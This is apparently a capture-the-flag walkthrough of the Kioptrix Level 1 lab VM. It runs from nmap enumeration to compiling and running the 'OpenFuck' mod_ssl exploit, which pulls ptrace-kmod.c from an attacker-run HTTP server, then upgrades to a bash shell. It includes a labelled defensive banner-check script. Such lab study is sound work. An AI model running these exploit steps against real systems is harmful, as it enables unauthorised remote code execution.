Kioptrix Level 1 (#1)

VulnHub virtual machine. On the path to OSCP, this box offered an Apache/OpenSSL vulnerability that led to a customised version of the exploit, plus an environmental problem and its solution.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Initial setup:

This boot-2-root box is on the legacy side of things, and there are a few things that need to be done before you are able to boot this image (VirtualBox):

  1. add the Kioptrix vmdk hard drive to storage as IDE (this box does NOT like SATA and will kernel panic)

  2. disable audio

  3. change the network adapter to PCnet-PCI II (AM79C970A) and set its "Attached to" adapter

  4. disable USB

With this configuration you should be able to properly boot the box.


Enumeration

Searching for the target:

netdiscover -r 192.168.56.0/24

The target looks to be 192.168.56.103.

Perform an nmap scan:

nmap -sC -sV -oA nmap/kio1 192.168.56.103

It is interesting to note that we have quite a few ports to examine.

Since this is an older box, let's search for any known vulnerabilities pertaining to Apache and its mod_ssl 2.8.4 / OpenSSL.

searchsploit:

searchsploit mod_ssl

Interesting candidate: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow

Based on CVE-2002-0082: the session cache code fails to properly initialize memory when using a particular function, which allows a buffer overflow that can be used to execute arbitrary code.

source: https://nvd.nist.gov/vuln/detail/CVE-2002-0082
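As an added example that is not part of the original writeup, the following banner check flags mod_ssl versions older than the 2.8.7 fix threshold named in the searchsploit entry above, which is useful for triaging nmap -sV output across an estate before anything is touched. The Server banners are constructed samples, not captures from the box.

```python
import re

# Fix threshold taken from the searchsploit entry on this page: mod_ssl < 2.8.7
FIXED_MODSSL = (2, 8, 7)

# Constructed sample banners (not captured from the box); on a real host the
# Server header reported by nmap -sV would be fed in instead.
SAMPLE_BANNERS = [
    "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "Apache/1.3.23 (Unix) mod_ssl/2.8.7 OpenSSL/0.9.6c",
    "Apache/2.4.41 (Ubuntu)",
]


def parse_version(text):
    """Turn a dotted version string such as '2.8.4' into a comparable tuple."""
    return tuple(int(part) for part in text.split("."))


def modssl_version(banner):
    """Return the mod_ssl version tuple from a Server banner, or None if absent."""
    match = re.search(r"mod_ssl/(\d+(?:\.\d+)*)", banner)
    return parse_version(match.group(1)) if match else None


def is_vulnerable(banner):
    """True when the banner advertises a mod_ssl older than the 2.8.7 fix."""
    version = modssl_version(banner)
    # Hosts without mod_ssl in the banner are not flagged by this check.
    return version is not None and version < FIXED_MODSSL


def triage(banners):
    """Map each banner to whether it should be flagged for CVE-2002-0082."""
    return {banner: is_vulnerable(banner) for banner in banners}


if __name__ == "__main__":
    for banner, flagged in triage(SAMPLE_BANNERS).items():
        print(("FLAG   " if flagged else "ok     ") + banner)
```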

Exploit

Copy the exploit locally:

searchsploit -m exploits/unix/remote/764.c

View the source:

Check the source for any suspicious shellcode and replace it if needed.

Compile the source code:

gcc -o exploit 764.c -lcrypto

It looks to be missing some dependencies.

Correction: the exploit above requires updating; a corrected version can be found at this repository.

git clone https://github.com/heltonWernik/OpenFuck.git

Download ptrace-kmod.c and start a Python SimpleHTTPServer in the directory containing the file.

Edit the external link at line 671 so it points at your SimpleHTTPServer.

Install dependencies:

apt-get install libssl-dev

Compile:

gcc -o OpenFuck OpenFuck.c -lcrypto

Run the exploit:

./OpenFuck

Look up the target identifier for the service you are attempting to exploit, then use the following syntax to continue.

./OpenFuck 0x6b [Target IP] [port] -c 40

Running the exploit against the box:

./OpenFuck 0x6a 192.168.56.103 443 -c 50

It hung waiting on the exploit's race condition. Good to see the exploit being pulled from the SimpleHTTPServer, though.

Root - Plot Shift

Change of plans: I reverted the link back to the original website, which I know the box won't be able to reach. At that point I performed the steps manually to change the terminal type and get a bash shell.

TERM=xterm; export TERM=xterm; exec bash -i

bring me the root!